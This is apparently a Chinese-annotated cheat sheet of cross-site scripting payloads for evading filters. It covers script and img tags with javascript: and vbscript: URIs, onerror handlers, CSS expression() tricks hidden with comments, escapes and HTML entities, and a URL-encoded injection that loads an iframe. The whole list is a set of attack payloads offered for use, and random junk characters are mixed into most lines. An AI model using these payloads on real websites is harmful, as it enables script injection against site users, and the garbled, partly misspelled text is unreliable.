<script>alert("跨站")</script> (最常用)" {) u" V$ ]/ `( w! E
<img scr=javascript:alert("跨站")></img>) L# Q0 O y1 g5 ^% Y9 ~1 L% `
<img scr="javascript: alert(/跨站/)></img>
/ H% L# F/ c* M6 @<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
* Y/ r" s( M `( X# @7 m3 {) \<img scr="#" onerror=alert(/跨站/)></img>% j0 {% S1 p. S) p( e! [# m
<img scr="#" style="xss:expression(alert(/xss/));"></img>$ c, k+ u$ t9 A' y
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释), P. ]# M8 G1 h
<img src=vbscript:msgbox ("xss")></img>
, D- T% _1 j# W9 E1 C4 d<style> input {left:expression (alert('xss'))}</style>
; ^/ [8 ?& ~1 i9 j% U: x1 l<div style={left:expression (alert('xss'))}></div>
9 w3 Q# a) ]. N% n/ U% u<div style={left:exp/* */ression (alert('xss'))}></div>
# Z$ K" B0 C+ d- J<div style={left:\0065\0078ression (alert('xss'))}></div>) a) W: Q0 w* ]7 {, F# C6 _
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>8 E, _1 U l0 f
unicode <div style="{left:expRessioN (alert('xss'))}">
% ^0 I F+ b+ e, U4 |9 O1 S X0 \0 g/ y+ p7 r
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["% K6 u2 J" v7 L2 P" N
|